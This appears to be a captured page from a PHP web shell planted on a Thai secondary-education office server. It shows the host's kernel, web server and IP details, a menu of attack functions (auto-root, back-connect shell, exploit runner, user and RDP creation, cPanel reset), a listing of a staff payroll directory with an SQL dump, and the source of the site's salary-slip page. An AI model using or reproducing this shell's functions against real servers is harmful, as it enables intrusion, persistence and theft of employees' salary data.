Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
salary29 /
[ HOME SHELL ]
Name
Size
Permission
Action
Connections
[ DIR ]
drwxr-xr-x
_mmServerScripts
[ DIR ]
drwxr-xr-x
_notes
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
admin1
[ DIR ]
drwxr-xr-x
salary2020
[ DIR ]
drwxr-xr-x
salary2021
[ DIR ]
drwxr-xr-x
PHPCounter.txt
8
B
-rwxrwxrwx
apr64.php
11.58
KB
-rw-r--r--
apr65.php
11.58
KB
-rw-r--r--
apr66.php
11.58
KB
-rw-r--r--
apr67.php
11.59
KB
-rw-r--r--
apr68.php
11.59
KB
-rw-r--r--
aug64.php
11.58
KB
-rw-r--r--
aug65.php
11.58
KB
-rw-r--r--
aug66.php
11.58
KB
-rw-r--r--
aug67.php
11.59
KB
-rw-r--r--
aug68.php
11.59
KB
-rw-r--r--
dec63.php
11.4
KB
-rw-r--r--
december64.php
11.59
KB
-rw-r--r--
december65.php
11.59
KB
-rw-r--r--
december66.php
11.59
KB
-rw-r--r--
december67.php
11.6
KB
-rw-r--r--
edit_ok.php
1.33
KB
-rw-r--r--
edit_user.php
6.73
KB
-rw-r--r--
feb64.php
11.41
KB
-rw-r--r--
feb65.php
11.59
KB
-rw-r--r--
feb66.php
11.59
KB
-rw-r--r--
feb67.php
11.59
KB
-rw-r--r--
feb68.php
11.6
KB
-rw-r--r--
index.php
5.9
KB
-rw-r--r--
jan64.php
11.39
KB
-rw-r--r--
jan65.php
11.58
KB
-rw-r--r--
jan66.php
11.58
KB
-rw-r--r--
jan67.php
11.58
KB
-rw-r--r--
jan68.php
11.59
KB
-rw-r--r--
jul64.php
11.58
KB
-rw-r--r--
jul65.php
11.58
KB
-rw-r--r--
jul66.php
11.58
KB
-rw-r--r--
jul67.php
11.59
KB
-rw-r--r--
jul68.php
11.59
KB
-rw-r--r--
jun64.php
11.59
KB
-rw-r--r--
jun65.php
11.59
KB
-rw-r--r--
jun66.php
11.59
KB
-rw-r--r--
jun67.php
11.6
KB
-rw-r--r--
jun68.php
11.6
KB
-rw-r--r--
login_fail.php
1.35
KB
-rw-r--r--
logo2.png
229.12
KB
-rw-r--r--
main.php
17.8
KB
-rw-r--r--
main_.php
8.84
KB
-rw-r--r--
mar64.php
11.58
KB
-rw-r--r--
mar65.php
11.58
KB
-rw-r--r--
mar66.php
11.58
KB
-rw-r--r--
mar67.php
11.58
KB
-rw-r--r--
mar68.php
11.59
KB
-rw-r--r--
may64.php
11.58
KB
-rw-r--r--
may65.php
11.58
KB
-rw-r--r--
may66.php
11.58
KB
-rw-r--r--
may67.php
11.59
KB
-rw-r--r--
may68.php
11.59
KB
-rw-r--r--
nouser.php
6.72
KB
-rw-r--r--
nov63.php
11.4
KB
-rw-r--r--
nov64.php
11.59
KB
-rw-r--r--
nov65.php
11.59
KB
-rw-r--r--
nov66.php
11.59
KB
-rw-r--r--
nov67.php
11.6
KB
-rw-r--r--
oct63.php
11.39
KB
-rw-r--r--
oct64.php
11.58
KB
-rw-r--r--
oct65.php
11.58
KB
-rw-r--r--
oct66.php
11.58
KB
-rw-r--r--
oct67.php
11.59
KB
-rw-r--r--
sep64.php
11.58
KB
-rw-r--r--
sep65.php
11.58
KB
-rw-r--r--
sep66.php
11.58
KB
-rw-r--r--
sep67.php
11.59
KB
-rw-r--r--
slipmanaul.jpg
25.32
KB
-rw-r--r--
slipmanaul.pdf
367.72
KB
-rw-r--r--
spmsalary.sql
697.92
KB
-rw-r--r--
spt.jpg
22.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.php
<?php require_once('Connections/Connecdata.php'); ?> <?php //initialize the session if (!isset($_SESSION)) { session_start(); } // ** Logout the current user. ** $logoutAction = $_SERVER['PHP_SELF']."?doLogout=true"; if ((isset($_SERVER['QUERY_STRING'])) && ($_SERVER['QUERY_STRING'] != "")){ $logoutAction .="&". htmlentities($_SERVER['QUERY_STRING']); } if ((isset($_GET['doLogout'])) &&($_GET['doLogout']=="true")){ //to fully log out a visitor we need to clear the session varialbles $_SESSION['MM_Username'] = NULL; $_SESSION['MM_UserGroup'] = NULL; $_SESSION['PrevUrl'] = NULL; unset($_SESSION['MM_Username']); unset($_SESSION['MM_UserGroup']); unset($_SESSION['PrevUrl']); $logoutGoTo = "index.php"; if ($logoutGoTo) { header("Location: $logoutGoTo"); exit; } } ?> <?php if (!isset($_SESSION)) { session_start(); } $MM_authorizedUsers = ""; $MM_donotCheckaccess = "true"; // *** Restrict Access To Page: Grant or deny access to this page function isAuthorized($strUsers, $strGroups, $UserName, $UserGroup) { // For security, start by assuming the visitor is NOT authorized. $isValid = False; // When a visitor has logged into this site, the Session variable MM_Username set equal to their username. // Therefore, we know that a user is NOT logged in if that Session variable is blank. if (!empty($UserName)) { // Besides being logged in, you may restrict access to only certain users based on an ID established when they login. // Parse the strings into arrays. $arrUsers = Explode(",", $strUsers); $arrGroups = Explode(",", $strGroups); if (in_array($UserName, $arrUsers)) { $isValid = true; } // Or, you may restrict access to only certain users based on their username. if (in_array($UserGroup, $arrGroups)) { $isValid = true; } if (($strUsers == "") && true) { $isValid = true; } } return $isValid; } $MM_restrictGoTo = "index.php"; if (!((isset($_SESSION['MM_Username'])) && (isAuthorized("",$MM_authorizedUsers, $_SESSION['MM_Username'], $_SESSION['MM_UserGroup'])))) { $MM_qsChar = "?"; $MM_referrer = $_SERVER['PHP_SELF']; if (strpos($MM_restrictGoTo, "?")) $MM_qsChar = "&"; if (isset($_SERVER['QUERY_STRING']) && strlen($_SERVER['QUERY_STRING']) > 0) $MM_referrer .= "?" . $_SERVER['QUERY_STRING']; $MM_restrictGoTo = $MM_restrictGoTo. $MM_qsChar . "accesscheck=" . urlencode($MM_referrer); header("Location: ". $MM_restrictGoTo); exit; } ?> <?php if (!function_exists("GetSQLValueString")) { function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") { if (PHP_VERSION < 6) { $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue; } $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue); switch ($theType) { case "text": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "long": case "int": $theValue = ($theValue != "") ? intval($theValue) : "NULL"; break; case "double": $theValue = ($theValue != "") ? doubleval($theValue) : "NULL"; break; case "date": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; break; } return $theValue; } } $colname_Recordset1 = "-1"; if (isset($_SESSION['MM_Username'])) { $colname_Recordset1 = $_SESSION['MM_Username']; } $colname_Recordset1 = "-1"; if (isset($_SESSION['MM_Username'])) { $colname_Recordset1 = (get_magic_quotes_gpc()) ? $_SESSION['MM_Username'] : addslashes($_SESSION['MM_Username']); } mysql_select_db($database_Connecdata, $Connecdata); $query_Recordset1 = sprintf("SELECT * FROM oct63 WHERE id_per = '%s' ORDER BY id DESC", $colname_Recordset1); $Recordset1 = mysql_query($query_Recordset1, $Connecdata) or die(mysql_error()); $row_Recordset1 = mysql_fetch_assoc($Recordset1); $totalRows_Recordset1 = mysql_num_rows($Recordset1); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>:: สลิปเงินเดือนพนักงานราชการ ลูกจ้าง สพม.29 ::</title> <style type="text/css"> <!-- .style1 { color: #FFFFFF; font-weight: bold; } --> </style> </head> <body> <table width="100%" border="0"> <tr> <td align="center"><table width="80%" border="1"> <tr> <td align="center" bgcolor="#FF9900"><h2><strong>สำนักงานเขตพื้นที่การศึกษามัธยมศึกษาอุบลราชธานี อำนาจเจริญ </strong></h2></td> </tr> <tr> <td align="center"><form id="form1" name="form1" method="post" action=""> <p><strong>ระบบแจ้งยอดเงินเดือน ออนไลน์ </strong><br /> <br /> <strong>ยินดีต้อนรับ </strong> <?php echo $row_Recordset1['name']; ?> <strong>โปรดเลือกรายการ </strong></p> <table width="302" height="884" border="0"> <tr height="19"> <td height="19" colspan="2" align="center" bgcolor="#0000FF"><span class="style1">ปี 2568</span></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jan68.php">มกราคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="jul68.php">กรกฎาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="feb68.php">กุมภาพันธ์</a></td> <td align="center" bgcolor="#FFEBCC"><a href="aug68.php">สิงหาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="mar68.php">มีนาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="#sep68.php">กันยายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="apr68.php">เมษายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="#oct68.php">ตุลาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="may68.php">พฤษภาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="#nov68.php">พฤศจิกายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jun68.php">มิถุนายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="#december68.php"> ธันวาคม</a></td> </tr> <tr height="19"> <td height="19" colspan="2" align="center" bgcolor="#FF9900"><span class="style1">ปี 2567</span></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jan67.php">มกราคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="jul67.php">กรกฎาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="feb67.php">กุมภาพันธ์</a></td> <td align="center" bgcolor="#FFEBCC"><a href="aug67.php">สิงหาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="mar67.php">มีนาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="sep67.php">กันยายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="apr67.php">เมษายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="oct67.php">ตุลาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="may67.php">พฤษภาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="nov67.php">พฤศจิกายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jun67.php">มิถุนายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="december67.php"> ธันวาคม</a></td> </tr> <tr height="19"> <td height="19" colspan="2" align="center" bgcolor="#FF9900"><span class="style1">ปี 2566</span></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jan66.php">มกราคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="jul66.php">กรกฎาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="feb66.php">กุมภาพันธ์</a></td> <td align="center" bgcolor="#FFEBCC"><a href="aug66.php">สิงหาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="mar66.php">มีนาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="sep66.php">กันยายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="apr66.php">เมษายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="oct66.php">ตุลาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="may66.php">พฤษภาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="nov66.php">พฤศจิกายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jun66.php">มิถุนายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="december66.php"> ธันวาคม</a></td> </tr> <tr height="19"> <td height="19" colspan="2" align="center" bgcolor="#FF9900"><span class="style1">ปี 2565</span></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jan65.php">มกราคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="jul65.php">กรกฎาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="feb65.php">กุมภาพันธ์</a></td> <td align="center" bgcolor="#FFEBCC"><a href="aug65.php">สิงหาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="mar65.php">มีนาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="sep65.php">กันยายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="apr65.php">เมษายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="oct65.php">ตุลาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="may65.php">พฤษภาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="nov65.php">พฤศจิกายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jun65.php">มิถุนายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="december65.php"> ธันวาคม</a></td> </tr> <tr height="19"> <td height="19" colspan="2" align="center" bgcolor="#FF9900"><span class="style1">ปี 2564</span></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jan64.php">มกราคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="jul64.php">กรกฎาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="feb64.php">กุมภาพันธ์</a></td> <td align="center" bgcolor="#FFEBCC"><a href="aug64.php">สิงหาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="mar64.php">มีนาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="sep64.php">กันยายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="apr64.php">เมษายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="oct64.php">ตุลาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="may64.php">พฤษภาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="nov64.php">พฤศจิกายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="jun64.php">มิถุนายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="december64.php"> ธันวาคม</a></td> </tr> <tr height="19"> <td height="19" colspan="2" align="center" bgcolor="#FF9900"><span class="style1">ปี 2563</span></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="salary2020/jan2020.php">มกราคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="salary2020/jul2020.php">กรกฎาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="salary2020/feb2020.php">กุมภาพันธ์</a></td> <td align="center" bgcolor="#FFEBCC"><a href="salary2020/aug2020.php">สิงหาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="salary2020/mar2020.php">มีนาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="salary2020/sep2020.php">กันยายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="salary2020/apr2020.php">เมษายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="oct63.php">ตุลาคม</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="salary2020/may2020.php">พฤษภาคม</a></td> <td align="center" bgcolor="#FFEBCC"><a href="nov63.php">พฤศจิกายน</a></td> </tr> <tr height="19"> <td height="19" align="center" bgcolor="#FFEBCC"><a href="salary2020/jun2020.php">มิถุนายน</a></td> <td align="center" bgcolor="#FFEBCC"><a href="dec63.php"> ธันวาคม</a></td> </tr> </table> <p> <label></label> </p> <p><a href="<?php echo $logoutAction ?>">ออกจากระบบ</a><br /> </p> </form> </td> </tr> <tr> <td align="center" bgcolor="#FF9900"><table width="100%" align="center" cellpadding="0" cellspacing="0"> <tbody> <tr> <td height="20"><div align="center"> <div align="center"><strong>สำนักงานเขตพื้นที่การศึกษามัธยมศึกษาอุบลราชธานี อำนาจเจริญ </strong></div> </div></td> </tr> <tr> <td height="16"><div align="center"> <div align="center">ที่ตั้ง : ถนนเลี่ยงเมือง (สี่แยก อ.บ.ต.กุดลาด) บ้านกุดลาด หมู่ที่ 9 ตำบลกุดลาด อำเภอเมือง จังหวัดอุบลราชธานี 34000</div> </div></td> </tr> <tr> <td height="20"><div align="center"><strong>เบอร์โทรศัพท์ : </strong>0-4542-2186, Fax : 0-4542-2185<strong> Email :</strong> <a href="mailto:secondary29@obec.go.th">secondary29@obec.go.th</a></div></td> </tr> </tbody> </table> </td> </tr> </table></td> </tr> <tr> <td align="center"><table width="80%" border="0"> <tr> <td align="center"> </td> </tr> </table></td> </tr> </table> </body> </html> <?php mysql_free_result($Recordset1); ?>
Close